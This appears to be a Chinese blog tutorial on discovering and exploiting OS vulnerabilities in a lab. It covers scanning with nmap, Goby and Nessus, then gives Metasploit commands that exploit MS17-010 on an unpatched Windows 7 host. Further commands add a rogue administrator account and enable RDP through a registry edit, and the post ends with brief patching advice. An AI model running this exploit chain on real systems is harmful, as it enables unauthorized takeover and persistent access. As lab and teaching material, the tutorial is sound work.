当前位置: 首页 > news >正文

操作系统漏洞发现

操作系统漏洞发现

  • 前言
  • 一、操作系统漏洞发现
      • 1.1 namp
      • 2. Goby
      • 3. Nessus
  • 二,进行渗透测试
      • 2.1 使用工具进行渗透
          • 1. metasploit
      • 2.2 EXP
      • 2.3 复现文章
  • 三,操作系统漏洞修复


前言

不管是对于App来说,还是web站点来说,操作系统是必须的,对于任何一个站点,进行渗透,无非就是渗透如下几个方面:

  1. 操作系统,进行信息收集后,查看站点操作系统是否为最新版本,如果不是,在网上搜索,看当前操作系统是否有漏洞出现
  2. 系统软件,进行信息收集后,通过看站点所开放的端口,可以大致确定对方站点系统所使用的软件,入80端口,就是http服务端口,对方站点应该有web站点,开发8080对方站点可能有apache等软件,在网上查找,看当前apache版本是否有漏洞
  3. 第三方软件,如phpmyadmin,ssh工具等,看这个版本的软件是否有漏洞
  4. 最后一步才是对站点网站进行渗透,看网站是否有sql注入,逻辑漏洞等

如下是针对操作系统漏洞发现的类容:


一、操作系统漏洞发现

想要发现操作系统漏洞,不用想,肯定是工具扫描啊,推荐如下三款工具,namp,Goby,nessus。

1.1 namp

namp扫描教程

如上教程中的脚本利用就是操作系统漏洞扫描,如下是我扫描windows7靶机的结果,由于安装的是没有进行更新的windows,所以存在该漏洞,图如下所示:

在这里插入图片描述

2. Goby

Goby使用的是忍者操作系统上面的,忍者操作系统下载:忍者操作系统安装教程,进行漏洞扫描,就如下两步,把英文设置为中文之后,一切操作都非常简单,具体操作如下所示:
请添加图片描述

请添加图片描述

如上所示,点击开始就可以进行漏洞扫描了,全部扫描结果以可视化的方式进行展现,非常的人性化。

3. Nessus

Nessus是三款工具中最优秀的,Nessus的安装教程:Nessus安装教程,安装好之后就可以进行漏洞扫描了,其中的操作在安装教程中有说,我这里就不进行重新说明了:

二,进行渗透测试

2.1 使用工具进行渗透

1. metasploit
  1. 开启metasploit,及打开metasploit的控制台,使用如下两条命令:

    service postgresql start  # 开启数据库postgresq
    msfconsole  # 打开控制台
    
  2. 搜索ms17-010可以利用的漏洞模块,再次确定是否存在漏洞,如下所示:
    在这里插入图片描述

    search ms17-010  # 搜索模块
    use 3  # 使用第三个模块,看目标主机是否存在这个漏洞(进一步的确定)
    show options  # 查看需要设置的参数
    set rhost 192.168.93.134  # 设置参数,目标机器的IP地址为 192.168.93.134
    run  # 进行攻击,exploit命令也可以
    

    在这里插入图片描述

  3. 搜索ms17-010可以利用的漏洞模块,对漏洞进行攻击,控制目标机器,如下所示:依次使用如下几条命令

search ms17-010
use 0  # 使用攻击模块攻击主机
show options
set rhost 192.168.93.134  设置攻击的目标地址
exploit

在这里插入图片描述
4. 进行提权等一系列操作

shell  # 控制目标机器
net user root 123456 /add  # 创建普通用户
net localgroup administrators root /add  # 对普通用户进行提权

进行如下操作后,你打开windows目标机器,你会发现多了一个超级管理员用户如下所示:

在这里插入图片描述
5. 远程访问控制

首先输入REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f,打开目标机器的3389端口,该端口开放后就可以进行远程连接了:

在这里插入图片描述

开放端口之后,在新的终端进行远程桌面的连接,如下所示:

rdesktop 192.168.93.134:3389  # 进行远程连接目标机器,192.168.93.134是我目标机器的IP地址

在这里插入图片描述

如上再输入yes就是远程桌面的连接了,连接后的结果如下所示:

在这里插入图片描述
在这里插入图片描述

2.2 EXP

EXP是漏洞攻击的代码,可以进入如下两个网站进行查找,如下所示:
seebug漏洞平台
国家漏洞安全平台
在这里插入图片描述
漏洞利用数据库

2.3 复现文章

复现文章网上都有,直接寻找,如永恒之蓝:

在这里插入图片描述
搜索技巧:
信息搜集

三,操作系统漏洞修复

  1. 针对设计错误,微软公司会及时推出补丁程序,用户只需及时下载并安装即可,因此建议用户经常浏览微软的安全公告,并及时下载补丁。

  2. 对于设置错误,则应及时修改配置,使系统更加安全可靠。

http://www.lryc.cn/news/43921.html

相关文章:

  • Linux gdb调试底层原理
  • LC-1647. 字符频次唯一的最小删除次数(哈希+计数)
  • HTTP状态码
  • 【Linux】初见“which命令”,“find命令”以及linux执行命令优先级
  • update case when 多字段,多条件, mysql中case when用法
  • mysql隐式转换 “undefined“字符串匹配到mysql int类型0值字段
  • Redis八股文
  • InnoDB——详细解释锁的应用,一致性读,自增长与外键
  • C++模板基础(四)
  • pycharm使用记录
  • Linux命令·kill·killall
  • Linux /proc/version 文件解析
  • 【Django 网页Web开发】15. 实战项目:管理员增删改查,md5密码和密码重置(08)(保姆级图文)
  • STL容器之<array>
  • flask教程6:cookie和session
  • 【JavaEE初阶】第六节.网络原理TCP/IP协议
  • 模式识别 —— 第六章 支持向量机(SVM)与核(Kernel)
  • 总结 synchronized
  • 360周鸿祎又“开炮”:GPT 6-8就将产生自主意识!我们来测算一下对错
  • python——飞机大战小游戏
  • 数组(完全二叉树)向下建堆法与堆排序O(N*logN)
  • Lua require 函数使用
  • 【面试】如何定位线上问题?
  • 字节二面,原来我对自动化测试的理解太浅了
  • Android11.0 应用升级成功后立即断电重启,版本恢复
  • 关于python常用软件用法:Pycharm 常用功能
  • SOLIDWORKS你不知道的小技巧
  • 有了HTTP,为啥还要用RPC
  • [leetcode] 动态规划
  • 科大奥瑞物理实验——热电偶特性及其应用研究